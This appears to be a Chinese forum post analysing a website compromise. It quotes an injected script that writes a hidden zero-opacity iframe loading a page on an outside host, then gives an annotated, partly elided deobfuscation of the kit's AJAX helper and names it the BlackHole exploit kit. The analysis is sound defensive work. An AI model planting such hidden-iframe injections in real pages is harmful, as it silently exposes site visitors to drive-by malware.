首先是直接的。。。- <script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://stjohnsdryden.org/img/common/download.php"></iframe></div>');</script>
上面这段代码也被嵌入到了页面引用的js文件中，例如 http://expeditecourier.co.ke/wp- ... erfade.js?ver=3.0.3 。
它用 document.write 写出一个透明度为 0 的 iframe，访问者看不到，但浏览器仍会加载 iframe 指向的地址。
然后是最后那一段
解开是- function kx_M(file){
// Deobfuscated helper from the injected script. kx_M is a constructor for a
// small XMLHttpRequest wrapper; the page instantiates it once as window.ajax.
// NOTE(review): the member layout closely resembles the public SACK ("Simple
// AJAX Code Kit") wrapper with renamed identifiers -- confirm against a clean
// copy and diff the two, so that only the attacker's deviations need study.
// The paste is elided in the middle ("...." inside window.trim), so kx_k,
// kx_rN and runResponse, all called below, are not visible in this listing.
- this.kx_z=null; // XHR object, filled in by kx_rg()
- this.kx_P=function(){ // reset all request state to its defaults
- this.kx_B="GET"; // HTTP method passed to open()
- this.kx_i="?"; // separator between kx_F and the query string
- this.kx_rx="&"; // argument separator used by kx_H()
- this.kx_r=window;
- this.kx_rt=""; // query string (GET) / request body passed to send()
- this.kx_b=true; // not read anywhere in the visible code
- this.kx_w=false; // when true, runResponse() is called on completion
- this.kx_E=true; // checked first in runAJAX(); true means no request is sent
- this.kx_rr=null; // id of the DOM element that receives the response
- this.kx_A=null; // the element resolved from kx_rr
- this.kx_F=file; // request URL
- this.kx_t=new Object(); // name -> [value, flag] map, written by kx_c()/kx_v()
- this.kx_C=new Array(2); // [status, statusText] of the last response
- this.kx_r.offset=100} // side effect: sets the global window.offset to 100
- ;
- this.kx_n=function(){ // install the default callbacks
- this.kx_L=function(){ // readyState 1 callback, no-op by default
- }
- ;
- this.kx_u=function(){ // readyState 2 callback, no-op by default
- }
- ;
- this.kx_y=function(){ // readyState 3 callback, no-op by default
- }
- ;
- this.kx_J=function(){ // called when the response status is 200
- this.runResponse()}
- ;
- this.kx_e=function(){ // called for any other status, no-op by default
- }
- ;
- this.kx_q=function(){ // called by runAJAX() when kx_E is set
- this.runResponse()}
- }
- ;
- this.kx_m=function(){ // full reset: callbacks first, then data
- this.kx_n();
- this.kx_P()}
- ;
- this.kx_rg=function(){ // create the XHR object
- this.kx_k(); // kx_k is not defined in the visible part of the paste
- try{
- this.kx_z=new ActiveXObject("Msxml2.XMLHTTP")} // legacy IE ActiveX first
- catch(e1){
- try{
- this.kx_z=new ActiveXObject("Microsoft.XMLHTTP")}
- catch(e2){
- this.kx_z=null}
- }
- if(!this.kx_z){
- if(typeof XMLHttpRequest!="undefined"){
- this.kx_z=new XMLHttpRequest()}
- else{
- this.kx_E=true} // kx_E is only ever set to true in the visible code, never cleared
- }
- }
- ;
- this.kx_c=function(kx_o,value){ // store a variable as-is, flag=false
- this.kx_t[kx_o]=Array(value,false)}
- ;
- this.kx_v=function(kx_o,value,returnvars){ // URI-encode name and value
- if(true==returnvars){
- return Array(encodeURIComponent(kx_o),encodeURIComponent(value))} // return the pair instead of storing it
- else{
- this.kx_t[encodeURIComponent(kx_o)]=Array(encodeURIComponent(value),true)} // store with flag=true
- }
- ;
- this.kx_H=function(kx_p,kx_S){ // split a "a=b&c=d" style string into stored variables
- kx_T=encodeURIComponent(this.kx_rx); // no var: kx_T, regexp, varArray, i and kx_j all become globals
- regexp=new RegExp(this.kx_rx+"|"+kx_T); // match the separator in raw or URI-encoded form
- varArray=kx_p.split(regexp);
- for(i=0;
- i<varArray.length;
- i++){
- kx_j=varArray[i].split("=");
- if(true==kx_S){
- this.kx_v(kx_j[0],kx_j[1])} // kx_S true: store encoded
- else{
- this.kx_c(kx_j[0],kx_j[1])} // otherwise store raw
- }
- }
- ;
- window.trim=function(kx_o,kx_f){ // assigned on window, not on this: a global helper outside the wrapper
- if("qabcdef".indexOf(kx_o.substr(0,1))>=0){ // only acts when the first character of kx_o is one of q, a-f
- var kx_rs=kx_o.split('q').join('').split('v'); // drop every 'q', then split the rest on 'v'
- for(var i=0;
- i<kx_r....response=d; // paste is elided at "....": the rest of window.trim and the head of the next method are missing
// NOTE(review): window.trim is presumably the decoder for the encoded block the
// post refers to; the loop body is not shown, so this cannot be confirmed here.
// The lines up to the next "}" are the tail of a method whose start is elided;
// what is visible re-initialises the same fields that kx_P() sets.
- this.kx_b=true;
- this.kx_w=false;
- this.kx_rr=null;
- this.kx_A=null;
- this.kx_F=file;
- this.kx_t=new Object();
- this.kx_C=new Array(2)}
- ;
- this.runAJAX=function(kx_R){ // entry point: send the request, or take the failure path
- if(this.kx_E){ // kx_P() sets kx_E=true and nothing visible clears it, so as pasted this branch is always taken
- this.kx_q()} // -> this.runResponse(), whose definition is not in the visible part
// NOTE(review): for triage, the XHR path below looks unreachable as pasted; the
// behaviour that matters is whatever runResponse does. Recover the elided
// section before drawing conclusions from the request code.
- else{
- this.kx_rN(kx_R); // not defined in the visible part; presumably builds kx_rt -- TODO confirm
- if(this.kx_rr){
- this.kx_A=document.getElementById(this.kx_rr)}
- if(this.kx_z){
- var self=this;
- if(this.kx_B=="GET"){
- kx_K=this.kx_F+this.kx_i+this.kx_rt; // no var: kx_K becomes a global
- this.kx_z.open(this.kx_B,kx_K,true)} // asynchronous request
- else{
- this.kx_z.open(this.kx_B,this.kx_F,true);
- try{
- this.kx_z.setRequestHeader("Content-Type","application/x-www-form-urlencoded")}
- catch(e){
- }
- }
- this.kx_z.onreadystatechange=function(){ // dispatch one callback per readyState
- switch(self.kx_z.readyState){
- case 1:self.kx_L();
- break;
- case 2:self.kx_u();
- break;
- case 3:self.kx_y();
- break;
- case 4:self.response=self.kx_z.responseText; // request finished: keep the body and status
- self.responseXML=self.kx_z.responseXML;
- self.kx_C[0]=self.kx_z.status;
- self.kx_C[1]=self.kx_z.statusText;
- if(self.kx_w){
- self.runResponse()}
- if(self.kx_A){
- elemNodeName=self.kx_A.nodeName; // no var: global
- elemNodeName.toLowerCase(); // result is discarded, so the comparisons below see nodeName unchanged
- if(elemNodeName=="input"||elemNodeName=="select"||elemNodeName=="option"||elemNodeName=="textarea"){
- self.kx_A.value=self.response}
- else{
- self.kx_A.innerHTML=self.response} // response text is written into the page as HTML (markup in it is parsed)
- }
- if(self.kx_C[0]=="200"){ // loose comparison of the status with the string "200"
- self.kx_J()}
- else{
- self.kx_e()}
- self.kx_rt="";
- break}
- }
- ;
- this.kx_z.send(this.kx_rt)}
- }
- }
- ;
- this.kx_m(); // constructor body: reset state ...
- this.kx_rg()} // ... then create the XHR object
// Start-up code: build the wrapper and call runAJAX() exactly once.
// NOTE(review): runAJAX() is reached on both the try and the catch path, so the
// setup inside try is not required for it to run -- treat that setup as possibly
// decorative until the elided part of kx_M has been recovered.
- window.ajax=new kx_M(); // no file argument, so kx_F starts out undefined
- try{
- var kx_G=document.getElementById('kx_D'); // looks up an element with id 'kx_D'
- ajax.kx_c("query",kx_G.kx_d.kx_f); // throws if kx_G is null or has no kx_d property -> catch
- ajax.kx_F="query.php"; // request URL
- ajax.kx_B=kx_G.kx_B.kx_f; // request method read from the same element
- ajax.kx_rr='kx_rz'; // id of the element that would receive the response
- ajax.kx_L=kx_N; // kx_N, kx_g, kx_s and kx_x are not defined in the visible part of the paste
- ajax.kx_u=kx_g;
- ajax.kx_y=kx_s;
- ajax.kx_J=kx_x;
- ajax.runAJAX()}
- catch(e){
- ajax.runAJAX()} // any error above is swallowed and runAJAX() is called anyway
-
嘿嘿，是 BlackHole v1.x exploit kit。
最后是中间数字的那一段，非常有意思。。。